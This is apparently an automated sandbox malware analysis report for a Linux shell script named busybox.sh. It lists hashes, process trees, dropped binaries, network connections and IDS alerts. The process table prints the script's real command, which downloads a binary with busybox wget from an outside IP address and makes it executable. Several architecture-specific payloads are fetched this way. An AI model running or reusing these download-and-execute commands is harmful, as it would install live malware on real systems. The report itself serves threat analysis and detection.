File name:

busybox.sh

Full analysis: https://app.any.run/tasks/f86ce461-643e-4a77-ab7d-b1cb3df787fa
Verdict: Malicious activity
Analysis date: June 15, 2025, 21:57:55
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

9F595DE31823C87CB9F56B9AEF2928AC

SHA1:

41C85FD450D9BE27421AFD4529C0BC895E5AE645

SHA256:

45B5E91F8A85F5FF1BDD5281F2EBC93D338F6DC82356000AF4C5BBC20E1733AC

SSDEEP:

24:jcskGDcsl0DcsQGNIxy/DcszXKnDcsy4DcsP8DcsWADcsyyZDcsrQlDcsQKDcsd7:jdkGDdl0DdYwDdzXsDdy4DdP8DdWADdI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cutex86_64 (PID: 41459)
      • cutex86_64 (PID: 41460)
      • cutex86_64 (PID: 41462)
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 41399)
      • bash (PID: 41401)
    • Potential Corporate Privacy Violation

      • busybox (PID: 41403)
      • busybox (PID: 41407)
      • busybox (PID: 41414)
      • busybox (PID: 41421)
      • busybox (PID: 41425)
      • busybox (PID: 41429)
      • busybox (PID: 41433)
      • busybox (PID: 41442)
      • busybox (PID: 41461)
      • busybox (PID: 41457)
    • Modifies file or directory owner

      • sudo (PID: 41396)
    • Connects to the server without a host name

      • busybox (PID: 41407)
      • busybox (PID: 41411)
      • busybox (PID: 41403)
      • busybox (PID: 41421)
      • busybox (PID: 41414)
      • busybox (PID: 41429)
      • busybox (PID: 41425)
      • busybox (PID: 41433)
      • busybox (PID: 41442)
      • busybox (PID: 41451)
      • busybox (PID: 41461)
      • busybox (PID: 41457)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 41401)
    • Connects to unusual port

      • cutex86_64 (PID: 41462)
      • cutex86_32 (PID: 41466)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
184
Monitored processes
53
Malicious processes
2
Suspicious processes
9

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox tracker-extract-3 no specs chmod no specs bash no specs busybox systemctl no specs systemctl no specs systemctl no specs chmod no specs bash no specs busybox systemctl no specs chmod no specs bash no specs busybox chmod no specs cutex86_64 no specs cutex86_64 no specs busybox cutex86_64 chmod no specs cutex86_32 no specs cutex86_32 no specs cutex86_32 rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
41395/bin/sh -c "sudo chown user /home/user/Desktop/busybox\.sh && chmod +x /home/user/Desktop/busybox\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/busybox\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41396sudo chown user /home/user/Desktop/busybox.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41397chown user /home/user/Desktop/busybox.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41398chmod +x /home/user/Desktop/busybox.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41399sudo -iu user /home/user/Desktop/busybox.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41401-bash --login -c \/home\/user\/Desktop\/busybox\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41402/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41403busybox wget http://103.149.252.178/skibidi/cutearm/usr/bin/busybox
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
41404chmod 777 ./cutearm/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41405-bash --login -c \/home\/user\/Desktop\/busybox\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
10
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
41403busybox/home/user/cutearmbinary
MD5:
SHA256:
41407busybox/home/user/cutearm5binary
MD5:
SHA256:
41414busybox/home/user/cutearm7binary
MD5:
SHA256:
41421busybox/home/user/cutem68kbinary
MD5:
SHA256:
41425busybox/home/user/cutemipsbinary
MD5:
SHA256:
41429busybox/home/user/cutemipselbinary
MD5:
SHA256:
41433busybox/home/user/cutepowerpcbinary
MD5:
SHA256:
41442busybox/home/user/cutesh4binary
MD5:
SHA256:
41457busybox/home/user/cutex86_64binary
MD5:
SHA256:
41461busybox/home/user/cutex86_32binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
36
DNS requests
13
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
169.150.255.180:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
204
91.189.91.48:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
169.150.255.180:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
91.189.91.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41403
busybox
GET
200
103.149.252.178:80
http://103.149.252.178/skibidi/cutearm
unknown
GET
200
169.150.255.180:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
GET
200
195.181.175.41:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
91.189.91.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
169.150.255.181:443
odrs.gnome.org
GB
whitelisted
41403
busybox
103.149.252.178:80
VIET DIGITAL TECHNOLOGY LIABILITY COMPANY
VN
unknown
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41407
busybox
103.149.252.178:80
VIET DIGITAL TECHNOLOGY LIABILITY COMPANY
VN
unknown
41411
busybox
103.149.252.178:80
VIET DIGITAL TECHNOLOGY LIABILITY COMPANY
VN
unknown
41414
busybox
103.149.252.178:80
VIET DIGITAL TECHNOLOGY LIABILITY COMPANY
VN
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 91.189.91.49
  • 91.189.91.98
  • 185.125.190.48
  • 91.189.91.48
  • 185.125.190.96
  • 91.189.91.96
  • 185.125.190.97
  • 185.125.190.49
  • 185.125.190.18
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.98
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2001:67c:1562::23
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2b
whitelisted
odrs.gnome.org
  • 169.150.255.181
  • 195.181.175.40
  • 37.19.194.81
  • 207.211.211.26
  • 195.181.170.19
  • 169.150.255.184
  • 212.102.56.179
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::21
whitelisted
google.com
  • 142.250.184.238
  • 2a00:1450:4001:831::200e
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.57
  • 185.125.188.54
  • 185.125.188.58
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
whitelisted
5.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info